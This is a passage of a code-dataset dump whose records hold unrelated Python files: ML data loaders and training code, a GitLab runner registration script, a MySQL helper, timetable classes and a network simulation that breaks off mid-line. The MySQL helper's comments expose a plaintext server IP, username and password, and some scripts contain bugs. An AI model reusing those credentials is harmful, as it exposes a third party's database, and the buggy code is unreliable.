TrainFromHdf5(data.Dataset):\n \"\"\"\n Creates a training set from a hdf5 file\n \"\"\"\n def __init__(self, file_path, patch_size, num_crops, transform=None):\n \"\"\"\n Keyword arguments:\n hdf_file -- the location containing the hdf5 file\n patch_size -- the size of the patches to extract for training\n num_crops -- the number of patches to extract for training\n transform -- an optional transform to apply to the data\n \"\"\"\n super()\n self.file_path = file_path\n with h5py.File(\n file_path, mode='r', libver='latest', swmr=True) as h5_file:\n self.num_samples = h5_file['train/colour'].attrs['shape'][0]\n self.grid_size = h5_file['train/colour'].attrs['shape'][1]\n self.depth = '/train/disparity/images'\n self.colour = '/train/colour/images'\n self.transform = transform\n self.patch_size = patch_size\n self.num_crops = num_crops\n random.seed()\n\n def __getitem__(self, index):\n \"\"\"\n Return item at index in 0 to len(self)\n In this case a set of crops from an lf sample\n Return type is a dictionary of depth and colour arrays\n \"\"\"\n with h5py.File(\n self.file_path, mode='r',\n libver='latest', swmr=True) as h5_file:\n idx = index // self.num_crops\n depth = torch.squeeze(torch.tensor(\n h5_file[self.depth][idx], dtype=torch.float32))\n colour = torch.tensor(\n h5_file[self.colour][idx], dtype=torch.float32)\n grid_size = self.grid_size\n sample = {'depth': depth, 'colour': colour, 'grid_size': grid_size}\n\n sample = data_transform.get_random_crop(sample, self.patch_size)\n sample = data_transform.random_gamma(sample)\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n return self.num_samples * self.num_crops\n\nclass ValFromHdf5(data.Dataset):\n \"\"\"\n Creates a validation set from a hdf5 file\n \"\"\"\n def __init__(self, file_path, transform=None):\n \"\"\"\n Keyword arguments:\n hdf_file -- the location containing the hdf5 file\n transform -- an optional transform to apply to the data\n \"\"\"\n super()\n self.file_path = file_path\n with h5py.File(\n file_path, mode='r', libver='latest', swmr=True) as h5_file:\n self.num_samples = h5_file['val/colour'].attrs['shape'][0]\n self.grid_size = h5_file['val/colour'].attrs['shape'][1]\n self.depth = '/val/disparity/images'\n self.colour = '/val/colour/images'\n self.transform = transform\n\n def __getitem__(self, index):\n \"\"\"\n Return item at index in 0 to len(self)\n In this case a set of crops from an lf sample\n Return type is a dictionary of depth and colour arrays\n \"\"\"\n with h5py.File(\n self.file_path, mode='r',\n libver='latest', swmr=True) as h5_file:\n depth = torch.squeeze(torch.tensor(\n h5_file[self.depth][index], dtype=torch.float32))\n colour = torch.tensor(\n h5_file[self.colour][index], dtype=torch.float32)\n grid_size = self.grid_size\n sample = {'depth': depth, 'colour': colour, 'grid_size': grid_size}\n\n # Running out of GPU memory on validation\n sample = data_transform.upper_left_patch(sample)\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n return self.num_samples\n\ndef create_dataloaders(args, config):\n \"\"\"Creates a train and val dataloader from a h5file and a config file\"\"\"\n print(\"Loading dataset\")\n file_path = os.path.join(config['PATH']['hdf5_dir'],\n config['PATH']['hdf5_name'])\n if not Path(file_path).is_file():\n print(file_path, \" is not a valid location\")\n print(\"Please enter a valid location of a h5 file through main.ini\")\n exit(-1)\n train_set = TrainFromHdf5(\n file_path=file_path,\n patch_size=int(config['NETWORK']['patch_size']),\n num_crops=int(config['NETWORK']['num_crops']),\n transform=data_transform.center_normalise)\n val_set = ValFromHdf5(\n file_path=file_path,\n transform=data_transform.center_normalise)\n\n batch_size = {'train': int(config['NETWORK']['batch_size']), 'val': 1}\n data_loaders = {}\n threads = int(config['NETWORK']['num_workers'])\n for name, dset in (('train', train_set), ('val', val_set)):\n data_loaders[name] = DataLoader(\n dataset=dset, num_workers=threads,\n batch_size=batch_size[name],\n shuffle=True)\n\n return data_loaders\n","sub_path":"Direct_3D/PythonCode/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"105573140","text":"#!/usr/bin/env python3\n\n###############################################################################\n# Copyright (c) 2019, Lawrence Livermore National Security, LLC\n# Produced at the Lawrence Livermore National Laboratory\n# Written by Thomas Mendoza mendoza33@llnl.gov\n# LLNL-CODE-795365\n# All rights reserved\n#\n# This file is part of gitlab-runner-auth:\n# https://github.com/LLNL/gitlab-runner-auth\n#\n# SPDX-License-Identifier: MIT\n###############################################################################\n\nimport os\nimport re\nimport sys\nimport socket\nimport argparse\nimport json\nimport urllib.request\nfrom string import Formatter\nfrom urllib.request import Request\nfrom urllib.parse import urlencode, urljoin\nfrom urllib.error import HTTPError\nfrom json import JSONDecodeError\n\n\ndef generate_tags(runner_type=\"\"):\n \"\"\"The set of tags for a host\n\n Minimally, this is the system hostname, but should include things like OS,\n architecture, GPU availability, etc.\n\n These tags are specified by runner configs and used by CI specs to run jobs\n on the appropriate host.\n \"\"\"\n\n # the hostname is _required_ to make this script work, everything else\n # is extra (as far as this script is concerned)\n hostname = socket.gethostname()\n\n # also tag with the generic cluster name by removing any trailing numbers\n tags = [hostname, re.sub(r\"\\d\", \"\", hostname)]\n if runner_type == \"batch\":\n\n def which(cmd):\n all_paths = (\n os.path.join(path, cmd) for path in os.environ[\"PATH\"].split(os.pathsep)\n )\n\n return any(\n os.access(path, os.X_OK) and os.path.isfile(path) for path in all_paths\n )\n\n if which(\"bsub\"):\n tags.append(\"lsf\")\n elif which(\"salloc\"):\n tags.append(\"slurm\")\n elif which(\"cqsub\"):\n tags.append(\"cobalt\")\n return tags\n\n\ndef list_runners(base_url, access_token, filters=None):\n try:\n query = \"\"\n if filters:\n query = \"?\" + urlencode(filters)\n\n url = urljoin(base_url, \"runners/all\" + query)\n request = Request(url, headers={\"PRIVATE-TOKEN\": access_token})\n return json.load(urllib.request.urlopen(request))\n except JSONDecodeError:\n print(\"Failed parsing request data JSON\")\n sys.exit(1)\n except HTTPError as e:\n print(\"Error listing Gitlab repos: {reason}\".format(reason=e.reason))\n sys.exit(1)\n\n\ndef runner_info(base_url, access_token, repo_id):\n try:\n url = urljoin(base_url, \"runners/\" + str(repo_id))\n request = Request(url, headers={\"PRIVATE-TOKEN\": access_token})\n return json.load(urllib.request.urlopen(request))\n except JSONDecodeError:\n print(\"Failed parsing request data JSON\")\n sys.exit(1)\n except HTTPError as e:\n print(\n \"Error while requesting repo info for repo {repo}: {reason}\".format(\n repo=repo_id, reason=e.reason\n )\n )\n sys.exit(1)\n\n\ndef valid_runner_token(base_url, token):\n \"\"\"Test whether or not a runner token is valid\"\"\"\n\n try:\n url = urljoin(base_url, \"runners/verify\")\n data = urlencode({\"token\": token})\n\n request = Request(url, data=data.encode(), method=\"POST\")\n urllib.request.urlopen(request)\n return True\n except HTTPError as e:\n if e.code == 403:\n return False\n else:\n print(\"Error while validating token: {}\".format(e.reason))\n sys.exit(1)\n\n\ndef register_runner(base_url, admin_token, runner_type, tags):\n \"\"\"Registers a runner and returns its info\"\"\"\n\n try:\n # the first tag is always the hostname\n url = urljoin(base_url, \"runners\")\n data = urlencode(\n {\n \"token\": admin_token,\n \"description\": tags[0] + \"-\" + runner_type,\n \"tag_list\": \",\".join(tags + [runner_type]),\n }\n )\n\n request = Request(url, data=data.encode(), method=\"POST\")\n response = urllib.request.urlopen(request)\n if response.getcode() == 201:\n return json.load(response)\n else:\n print(\"Registration for {runner_type} failed\".format(runner_type))\n sys.exit(1)\n except HTTPError as e:\n print(\n \"Error registering runner {runner} with tags {tags}: {reason}\".format(\n runner=runner_type, tags=\",\".join(tags), reason=e.reason\n )\n )\n sys.exit(1)\n\n\ndef delete_runner(base_url, runner_token):\n \"\"\"Delete an existing runner\"\"\"\n\n try:\n url = urljoin(base_url, \"runners\")\n data = urlencode(\n {\n \"token\": runner_token,\n }\n )\n\n request = Request(url, data=data.encode(), method=\"DELETE\")\n response = urllib.request.urlopen(request)\n if response.getcode() == 204:\n return True\n else:\n print(\"Deleting runner with id failed\")\n sys.exit(1)\n except HTTPError as e:\n print(\"Error deleting runner: {reason}\".format(reason=e.reason))\n sys.exit(1)\n\n\ndef update_runner_config(config_template, config_file, internal_config):\n \"\"\"Using data from config.json, write the config.toml used by the runner\n\n Nominally, this method will provide a dictionary of keyword arguments to\n format of the form:\n\n {\n \"\": \"\",\n ...,\n }\n\n The config.toml must specify named template args like:\n\n [[runners]]\n token = \"{runner_type}\"\n ...\n\n and _not_ use positional arguments.\n \"\"\"\n\n template_kwargs = {\n \"hostname\": socket.gethostname(),\n }\n template_kwargs.update(\n {runner: data[\"token\"] for runner, data in internal_config.items()}\n )\n\n with open(config_template) as th, open(config_file, \"w\") as ch:\n template = th.read()\n config = template.format(**template_kwargs)\n ch.write(config)\n\n\ndef configure_runner(prefix, api_url, stateless=False):\n \"\"\"Takes a config template and substitutes runner tokens\"\"\"\n\n runner_config = {}\n config_file = os.path.join(prefix, \"config.toml\")\n config_template = os.path.join(prefix, \"config.template\")\n\n # ensure trailing '/' for urljoin\n if api_url[:-1] != \"/\":\n api_url += \"/\"\n\n with open(os.path.join(prefix, \"admin-token\")) as fh:\n admin_token = fh.read()\n\n if stateless:\n with open(config_template) as fh:\n template = fh.read()\n try:\n with open(os.path.join(prefix, \"access-token\")) as fh:\n access_token = fh.read()\n except FileNotFoundError:\n print(\"A personal access token is required for stateless mode\")\n sys.exit(1)\n filters = {\"scope\": \"shared\", \"tag_list\": \",\".join([socket.gethostname()])}\n runner_types = set(\n token[1]\n for token in Formatter().parse(template)\n if token[1] != \"hostname\" and token[1] is not None\n )\n runners = [\n runner_info(api_url, access_token, r[\"id\"])\n for r in list_runners(api_url, access_token, filters=filters)\n ]\n gitlab_tags = set(tag for r in runners for tag in r[\"tag_list\"])\n if len(runner_types & gitlab_tags) == 0:\n # no config template tags in common with Gitlab, register runners\n # for all the tags pulled from the template.\n for runner_type in iter(runner_types):\n runner_config[runner_type] = register_runner(\n api_url,\n admin_token,\n runner_type,\n generate_tags(runner_type=runner_type),\n )\n else:\n for runner in runners:\n try:\n runner_type = (runner_types & set(runner[\"tag_list\"])).pop()\n runner_config[runner_type] = runner\n except KeyError:\n # we may have picked up a runner which doesn't match our\n # host, skip it\n pass\n else:\n try:\n # ensure tokens are still valid, otherwise, delete the runner and\n # register it again\n data_file = os.path.join(prefix, \"runner-data.json\")\n with open(data_file, \"r\") as fh:\n changed = False\n runner_config = json.load(fh)\n for runner_type, data in runner_config.items():\n data = data or {}\n token = data.get(\"token\", \"\")\n if not token or not valid_runner_token(api_url, token):\n # no refresh endpoint...delete and re-register\n if token:\n delete_runner(api_url, token)\n runner_config[runner_type] = register_runner(\n api_url, admin_token, runner_type, runner_type=runner_type\n )\n changed = True\n if changed:\n with open(data_file, \"w\") as fh:\n fh.write(json.dumps(runner_config, sort_keys=True, indent=4))\n except FileNotFoundError:\n # defaults to creating both a shell and batch runner\n runner_config = {\n t: register_runner(\n api_url, admin_token, t, generate_tags(runner_type=t)\n )\n for t in [\"shell\", \"batch\"]\n }\n with open(data_file, \"w\") as fh:\n fh.write(json.dumps(runner_config, sort_keys=True, indent=4))\n\n update_runner_config(config_template, config_file, runner_config)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"On the fly runner config\")\n parser.add_argument(\n \"-p\",\n \"--prefix\",\n default=\"/etc/gitlab-runner\",\n help=\"\"\"The runner config directory prefix\"\"\",\n )\n parser.add_argument(\n \"--api-url\", default=\"http://localhost:8080/api/v4\", help=\"\"\"Gitlab API URL\"\"\"\n )\n parser.add_argument(\n \"--stateless\",\n action=\"store_true\",\n help=\"\"\"If used, disables writing runner-data.json and must query\n Gitlab directly for state.\n \"\"\",\n )\n args = parser.parse_args()\n configure_runner(args.prefix, args.api_url, stateless=args.stateless)\n","sub_path":"gitlab_runner_config.py","file_name":"gitlab_runner_config.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"397463848","text":"#%%\nimport os\nimport numpy as np\nimport pandas as pd\nimport timeit\nimport pickle\nimport theano\nimport theano.tensor as T\nimport optimizers\nimport matplotlib.pyplot as plt\n\nfrom theano import shared, function\nfrom scipy import stats\nfrom models import Logit, ResNet\nfrom core import shared_dataset\n\nFLOATX = theano.config.floatX\n\nbatch_size = 20\nlearning_rate = 1e-3\nlayers = 1\nn_epochs = 1000\n\ndata = pd.read_csv('data-20190617.csv')\n# data['trip_length_km'] = stats.boxcox(data['trip_length_km']+1e-7, 0.191)\n# data['trip_duration_min'] = stats.boxcox(data['trip_duration_min']+1e-7, 0.20529)\nx_var = data.loc[:, 'weekend':'Non disponible']\ny_var = data.loc[:, 'activity_choice']\n\nn = data.shape[0]\nm = x_var.shape[1]\nslice = np.floor(0.7*n).astype(int)\n\ntrain_x_var, valid_x_var = x_var.iloc[:slice], x_var.iloc[slice:]\ntrain_y_var, valid_y_var = y_var.iloc[:slice], y_var.iloc[slice:]\n\ntrain_x_shared, train_y_shared = shared_dataset(train_x_var, train_y_var)\nvalid_x_shared, valid_y_shared = shared_dataset(valid_x_var, valid_y_var)\n\nn_train_batches = train_y_var.shape[0] // batch_size\nn_valid_batches = valid_y_var.shape[0] // batch_size\n\nindex = T.lscalar() # index to [mini]batch\n\nx = T.matrix('x')\ny = T.ivector('y')\n\n# model = Logit(input=x, choice=y, n_vars=m, n_choices=10)\n# cost = model.negative_log_likelihood(y)\n# opt = optimizers.RMSProp(model.params)\n# updates = opt.run_update(cost, model.params)\n\nmodel = ResNet(input=x, choice=y, n_vars=m, n_choices=10, n_layers=8)\ncost = model.negative_log_likelihood(y)\nopt = optimizers.RMSProp(model.resnet_params)\nupdates = opt.run_update(cost, model.resnet_params)\n\ntrain_model = function(\n inputs=[index],\n outputs=cost,\n updates=updates,\n allow_input_downcast=True,\n givens={\n x: train_x_shared[index * batch_size: (index + 1) * batch_size],\n y: train_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\nvalidate_model = function(\n inputs=[],\n outputs=cost,\n allow_input_downcast=True,\n givens={\n x: valid_x_shared,\n y: valid_y_shared,\n },\n)\n\npredict_model = function(\n inputs=[index],\n outputs=model.errors(y),\n allow_input_downcast=True,\n givens={\n x: valid_x_shared[index * batch_size: (index + 1) * batch_size],\n y: valid_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\nhessians = function(\n inputs=[index],\n outputs=model.get_gessians(y),\n allow_input_downcast=True,\n givens={\n x: train_x_shared[index * batch_size: (index + 1) * batch_size],\n y: train_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\npatience = 5000 # look as this many examples regardless\npatience_increase = 2\nimprovement_threshold = 0.9999\nvalidation_frequency = n_train_batches\n\nbest_validation_likelihood = np.inf\nstart_time = timeit.default_timer()\n\ndone_looping = False\nepoch = 0\n\nwhile (epoch < n_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(n_train_batches):\n # n = np.random.randint(0, n_train_batches)\n minibatch_avg_cost = train_model(minibatch_index)\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if (iter + 1) % validation_frequency == 0:\n validation_likelihood = validate_model()\n likelihood = np.sum(validation_likelihood)\n\n print(('epoch {:d}, minibatch {:d}/{:d}, '\n 'validation likelihood {:.2f}').format(\n epoch,\n minibatch_index + 1,\n n_train_batches,\n likelihood,\n )\n )\n\n if likelihood < best_validation_likelihood:\n # improve patience if loss improvement is good enough\n if likelihood < best_validation_likelihood * improvement_threshold:\n patience = max(patience, iter * patience_increase)\n\n best_validation_likelihood = likelihood\n\n validation_predict = [predict_model(i)\n for i in range(n_valid_batches)]\n error = np.mean(validation_predict)\n print((' '\n 'validation error {:.2%}').format(error))\n\n # save the best model\n with open('best_model.pkl', 'wb') as f:\n pickle.dump(model, f)\n\n if (patience <= iter) and (epoch > 10):\n done_looping = True\n break\n\nend_time = timeit.default_timer()\nprint(('Optimization complete with best validation likelihood of {:.2f}, '\n 'and validation error of {:.2%}').format(best_validation_likelihood, error))\nprint(('The code run for {:d} epochs, with {:.2f} epochs/sec').format(\n epoch,\n 1. * epoch / (end_time - start_time),\n )\n)\n\nprint('statistics...')\nmodel_hessians = np.mean([hessians(i) for i in range(n_train_batches)], axis=0)\nmodel_stderr = [np.sqrt(1/h) for h in model_hessians]\nmodel_tstat = [b.get_value()/s for b, s in zip(model.params, model_stderr)]\n# print('hessians', pd.DataFrame(model_hessians[0]))\n\n#%%\nprint('statistics...')\nnp.set_printoptions(precision=4, suppress=True)\nmodel_hessians = np.sum([hessians(i) for i in range(n_train_batches)], axis=0)\nmodel_stderr = [np.sqrt(1/h) for h in model_hessians]\nmodel_tstat = [b.get_value()/s for b, s in zip(model.params, model_stderr)]\n\n#%%\ndf = pd.DataFrame(model.params[0].eval())\ndf.to_csv('beta_init.csv', index=False, header=False)\nprint(df.shape)\ndf = pd.DataFrame(model.params[1].eval())\ndf.to_csv('beta_0_init.csv', index=False, header=False)\nprint(df.shape)\n\n#%%\ndef hinton(matrix, tstat=None, max_weight=None, ax=None):\n \"\"\"Draw Hinton diagram for visualizing a weight matrix.\"\"\"\n ax = ax if ax is not None else plt.gca()\n\n if not max_weight:\n max_weight = 2 ** np.ceil(np.log(np.abs(matrix).max(axis=1)) / np.log(2))\n matrix = (matrix - np.mean(matrix, axis=1, keepdims=True))/ np.std(matrix, axis=1, keepdims=True)\n\n ax.patch.set_facecolor('gray')\n ax.set_aspect('equal', 'box')\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n\n for (x, y), w in np.ndenumerate(matrix):\n\n size = np.sqrt(np.abs(w)/max_weight[y])\n color = 'white' if w > 0 else 'black'\n\n if tstat is not None:\n if tstat[x, y] >= 1:\n edge = 'red'\n else:\n edge = color\n else:\n edge = color\n\n rect = plt.Rectangle([x - size / 2, y - size / 2], size, size,\n facecolor=color, edgecolor=edge)\n ax.add_patch(rect)\n\n ax.autoscale_view()\n ax.invert_yaxis()\n\n\n#%%\ntstat = np.abs(model_tstat[0])\np = model.params[0].get_value()\nhinton(p, tstat=(tstat <= 1.96))\n\n\n#%%\n","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"12093394","text":"\"\"\"\n=================================\nAuthor: Flora Chen\nTime: 2021/1/20 20:33\n-_- -_- -_- -_- -_- -_- -_- -_-\n=================================\n\"\"\"\nimport pymysql\n\n\nclass DBHandler:\n \"\"\"\n 数据库操作\n \"\"\"\n\n def __init__(self,\n host=None,\n port=None,\n user=None,\n password=None,\n database=None,\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor # 加上这个返回的就是字典\n ):\n \"\"\"\n 初始化方法中, 连接到数据库\n \"\"\"\n\n # 建立连接\n self.conn = pymysql.connect(host=host,\n port=port,\n user=user,\n password=password,\n database=database,\n charset=charset,\n cursorclass=cursorclass\n )\n\n def query_all(self, sql):\n \"\"\"\n 查询所有符合sql条件的数据\n :param sql: 执行的sql\n :return: 查询结果\n \"\"\"\n # 创建一个游标对象\n self.cursor = self.conn.cursor()\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchall()\n self.cursor.close()\n return data\n\n def query_one(self, sql):\n \"\"\"\n 查询符合sql条件的数据的第一条数据\n :param sql: 执行的sql\n :return: 返回查询结果的第一条数据\n \"\"\"\n # 创建一个游标对象\n self.cursor = self.conn.cursor()\n\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchone()\n self.cursor.close()\n return data\n\n def insert(self, sql):\n \"\"\"\n 插入数据\n :param sql: 执行的sql\n \"\"\"\n # 创建一个游标对象\n self.cursor = self.conn.cursor()\n\n self.cursor.execute(sql)\n # 提交 只要数据库更新就要commit\n self.conn.commit()\n\n self.cursor.close()\n\n def update(self, sql):\n \"\"\"\n 更新数据\n :param sql: 执行的sql\n \"\"\"\n # 创建一个游标对象\n self.cursor = self.conn.cursor()\n\n self.cursor.execute(sql)\n # 提交 只要数据库更新就要commit\n self.conn.commit()\n\n self.cursor.close()\n\n def query(self, sql, one=True):\n \"\"\"\n 根据传值决定查询一条数据还是所有\n :param one: 默认True. True查一条数据,否则查所有\n :return:\n \"\"\"\n if one:\n return self.query_one(sql)\n else:\n return self.query_all(sql)\n\n def close(self):\n \"\"\"\n 断开游标,关闭数据库\n :return:\n \"\"\"\n self.conn.close()\n\n\nif __name__ == \"__main__\":\n db = DBHandler()\n # data = db.query_all(\"SELECT mobile_phone from member limit 1;\")\n # print(data[0][\"mobile_phone\"])\n # print(type(data))\n member_id = db.query_one(\"select id from member where mobile_phone=13504936561;\")[\"id\"]\n print(member_id, type(member_id))\n leave_amount = db.query_one(\"select leave_amount from member where mobile_phone=13504936561;\")[\"leave_amount\"]\n print(leave_amount)\n add_mount = db.update(\"update member set leave_amount={} where id={};\".format(500, member_id))\n\n leave_amount_after = db.query_one(\"select leave_amount from member where mobile_phone=13504936561;\")[\"leave_amount\"]\n print(leave_amount_after)\n db.close()\n\n\"\"\"\n1. 建立连接\n2. 获取游标\n3. 通过游标执行sql语句\n4. 通过游标得到结果\n\"\"\"\n\"\"\"\n# 建立连接\nconn = pymysql.connect(host=\"8.129.91.152\",\n port=3306,\n user=\"future\",\n password=\"123456\",\n # 注意: 不要写成utf-8\n charset=\"utf8\",\n database=\"futureloan\" # 这里指定数据库名称后,后面SQL语句就不需要带数据库名称了\n )\n# 获取游标\ncursor = conn.cursor()\n\n# 通过游标执行sql语句\n# cursor.execute(\"SELECT * FROM futureloan.member LIMIT 10;\")\ncursor.execute(\"SELECT * FROM member LIMIT 10;\")\ncursor.execute(\"SELECT * FROM member WHERE id={};\".format(1))\n\n# 通过游标得到结果 - 查询所有\n# data = cursor.fetchall()\n\n# 通过游标得到结果 - 查询一条数据\ndata = cursor.fetchone()\nprint(data)\n\n# 断开游标,关闭数据库\ncursor.close()\nconn.close()\n\n\"\"\"\n","sub_path":"common/db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"445336846","text":"#럭키 스트레이트\n\nn=input()\narr=list(map(int,n))\nmid=len(arr)//2\n\nle=0\nri=0\n\nfor i in range(mid):\n le += arr[i]\n ri += arr[mid+i]\n\nif le == ri:\n print(\"LUCKY\")\nelse: print(\"READY\")","sub_path":"031207.py","file_name":"031207.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"380250084","text":"#set($symbol_pound='#')\n#set($symbol_dollar='$')\n#set($symbol_escape='\\' )\nimport fnmatch\nimport os\n\n\ndef eclipse_clean():\n os.system(\"mvn clean eclipse:clean\")\n\n\ndef idea_clean():\n rm(\".\", [\"*.iml\", \"*.ipr\", \"*.iws\", \".idea_modules\", \".idea\"], True)\n\n\ndef rm(root, patterns, recursive=False):\n for path, sub_dirs, files in os.walk(root):\n for pattern in patterns:\n for filename in fnmatch.filter(files, pattern):\n os.remove(os.path.join(path, filename))\n if recursive:\n for dirname in fnmatch.filter(sub_dirs, pattern):\n rm(os.path.join(path, dirname), [\"*\"], recursive)\n os.rmdir(os.path.join(path, dirname))\n else:\n try:\n for dirname in fnmatch.filter(sub_dirs, pattern):\n os.rmdir(os.path.join(path, dirname))\n except OSError:\n print(\"Directory not empty:'%s'\" % os.path.join(path, dirname))\n\n\nif __name__ == \"__main__\":\n idea_clean()\n eclipse_clean()\n","sub_path":"src/main/resources/archetype-resources/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"45435957","text":"class Lesson:\n \"\"\"\n This class resembles each Lesson. I made it just so it would be easier to code it then use dictionaries\n \"\"\"\n def __init__(self, lesson: str, lesson_number: str, lesson_time: str, teacher: str, classroom: str):\n \"\"\"\n Parameters\n ------------\n lesson -> Represents the lesson subject\n\n lesson_number -> Represents the lesson number\n\n lesson_time -> Represents the lesson time\n\n teacher -> Represents the teacher\n\n classroom -> Represents teh classroom in which the lesson will be in\n ------------\n\n All parameters can be None\n \"\"\"\n self.lesson = lesson\n self.number = lesson_number\n self.time = lesson_time\n self.teacher = teacher\n self.classroom = classroom\n\n def to_dict(self):\n return {\n \"lesson\": self.lesson,\n \"number\": self.number,\n \"time\": self.time,\n \"teacher\": self.teacher,\n \"classroom\": self.classroom\n }\n\n def __str__(self):\n return f\"שיעור: {self.lesson}.\\tשיעור מספר: {self.number}.\\tזמן: {self.time}.\\tמורה: {self.teacher}.\\tכיתה: {self.classroom}\"\n \n\nclass Day:\n \"\"\"\n This class represents a Day in the week. Was easier for me to use a class instead of a dictionary\n \"\"\"\n def __init__(self, day: int, items: list):\n \"\"\"\n Parameters\n ------------\n day -> Represents the day number\n\n items -> Represents the lessons in the day\n ------------\n \"\"\"\n days = {\n \"0\": \"ראשון\",\n \"1\": \"שני\",\n \"2\": \"שלישי\",\n \"3\": \"רביעי\",\n \"4\": \"חמישי\",\n \"5\": \"שישי\",\n }\n while day > 5:\n day -= 5\n while day < 0:\n day += 5\n self.day = days[f\"{day}\"]\n self.lessons = items\n \n def __str__(self):\n lessons = \"\"\n for i in self.lessons:\n lessons += f\"{i}\\n\"\n lessons = lessons[:-1]\n return f\"יום: {self.day}.\\n\\n\\nשיעורים: {lessons}\"\n\n\ndef find_lesson(iscool_lessons: list, teacher_name: str):\n \"\"\"\n Parameters\n ------------\n iscool_lessons -> Represents the iscool lessons\n\n teacher_name -> Represents the teacher name\n ------------\n \"\"\"\n for i in range(len(iscool_lessons)):\n if iscool_lessons[i].teacher == teacher_name:\n return iscool_lessons[i]\n\n\ndef compare(iscool_lessons: list, mashov_lessons: list, times: list):\n \"\"\"\n Parameters\n ------------\n iscool_lessons -> Represents the iscool lessons\n\n mashov_lessons -> Represents the mashov lessons\n\n times -> Represents the list of `times` in the timetable\n ------------\n \"\"\"\n classes = []\n for i in range(len(mashov_lessons)):\n if mashov_lessons[0].number == 1:\n lesson = find_lesson(iscool_lessons[i + 1], mashov_lessons[i].teacher)\n else:\n lesson = find_lesson(iscool_lessons[i], mashov_lessons[i].teacher)\n if isinstance(lesson, Lesson):\n classes.append(lesson)\n else:\n mashov_lessons[i].time = times[len(classes) + 1].contents[0].contents[2].text\n classes.append(mashov_lessons[i])\n return classes\n","sub_path":"extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"586854400","text":"import simpy\nimport functools\nimport random as np\nimport time\nfrom enum import Enum\nimport numpy\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\nimport batch_teste as lp\nimport pureBatchILP as plp\nimport copy\n\ncount = 0\n#timestamp to change the load\nchange_time = 3600\n#the next time\nnext_time = 3600\n#the actual hout time stamp\nactual_stamp = 0.0\n#inter arrival rate of the users requests\narrival_rate = 3600\n#service time of a request\nservice_time = lambda x: np.uniform(0,100)\n#total generated requests per timestamp\ntotal_period_requests = 0\n#to generate the traffic load of each timestamp\nloads = []\nactives = []\n#number of timestamps of load changing\nstamps = 24\nhours_range = range(1, stamps+1)\nfor i in range(stamps):\n\tx = norm.pdf(i, 12, 4)\n\tx *= 100\n\t#x= round(x,4)\n\t#if x != 0:\n\t#\tloads.append(x)\n\tloads.append(x)\n#distribution for arrival of packets\n#first arrival rate of the simulation - to initiate the simulation\narrival_rate = loads[0]/change_time\ndistribution = lambda x: np.expovariate(arrival_rate)\nloads.reverse()\n#print(loads)\nstamps = len(loads)\n#record the requests arrived at each stamp\ntraffics = []\n#amount of rrhs\nrrhs_amount = 100\n#list of rrhs of the network\nrrhs = []\n#amount of processing nodes\nnodes_amount = 10\n#list of processing nodes\nnodes = []\nrrh_nodes = range(0,10)\n#capacity of each rrh\nrrh_capacity = 5000\n#keeps the non allocated requests\nno_allocated = []\ntotal_aloc = 0\ntotal_nonaloc = 0\nlambdas = range(0,10)\nswitchBandwidth = [10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0]\nwavelength_capacity = [10000.0, 10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0]\nlc_cost = 20\nB = 1000000\nop = 0\nmaximum_load = 100\n#to keep the consumption of each allcoated RRH\npower_consumption = []\n#average of power consumption of each hour of the dary\naverage_power_consumption = []\n#to keep the power consumption of the batch allocation\nbatch_power_consumption = []\n#to jeep the average consumption of each hour of the day for the batch case\nbatch_average_consumption = []\n#counting the blocked RRHs\nincremental_blocking = 0\nbatch_blocking = 0\ntotal_inc_blocking = []\ntotal_batch_blocking = []\n#to count the redirected rrhs\nredirected = []\n#to count the activated nodes\nactivated_nodes = []\naverage_act_nodes = []\nb_activated_nodes = []\nb_average_act_nodes = []\n#to count the activated lambdas\nactivated_lambdas = []\naverage_act_lambdas = []\nb_activated_lambdas = []\nb_average_act_lambdas = []\n#to count the activated DUs\nactivated_dus = []\naverage_act_dus = []\nb_activated_dus = []\nb_average_act_dus = []\n#to count the activated switches\nactivated_switchs = []\naverage_act_switch = []\nb_activated_switchs = []\nb_average_act_switch = []\n#to count the redirected RRHs\nredirected_rrhs = []\naverage_redir_rrhs = []\nb_redirected_rrhs = []\nb_average_redir_rrhs = []\n#count the amount of time the solution took\ntime_inc = []\navg_time_inc = []\ntime_b = []\navg_time_b = []\n#count the occurrences of cloud and fog nodes\ncount_cloud = []\ncount_fog = []\nb_count_cloud = []\nb_count_fog = []\nmax_count_cloud = 